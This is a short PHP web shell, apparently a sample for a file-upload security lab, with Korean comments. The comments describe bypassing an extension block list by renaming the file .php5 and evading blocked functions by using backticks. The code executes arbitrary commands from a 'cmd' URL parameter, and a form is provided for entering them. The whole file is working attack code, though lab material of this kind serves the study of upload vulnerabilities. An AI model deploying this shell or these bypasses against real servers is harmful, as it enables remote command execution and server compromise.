<?php
/**
 * Level 2 우회 샘플 - .php5 확장자 사용
 *
 * 우회 기법:
 * - .php 확장자만 차단하므로 .php5 사용
 * - PHP 5.x 버전에서 사용되던 확장자
 *
 * 사용법:
 * 1. 확장자를 .txt에서 .php5로 변경
 * 2. Level 2 선택 후 업로드
 * 3. 브라우저에서 접근: http://localhost:8080/uploads/shell.php5?cmd=whoami
 */

if (isset($_GET['cmd'])) {
    echo "<pre>";
    // passthru는 차단 리스트에 있으므로 다른 함수 사용
    shell_exec($_GET['cmd']);  // 아, 이것도 차단됨!
    // 그렇다면 백틱 사용
    echo `{$_GET['cmd']}`;
    echo "</pre>";
} else {
    ?>
    <h3>Level 2 Bypass - .php5 Extension</h3>
    <form>
        <input type="text" name="cmd" placeholder="command" />
        <button>Execute</button>
    </form>
    <?php
}
?>
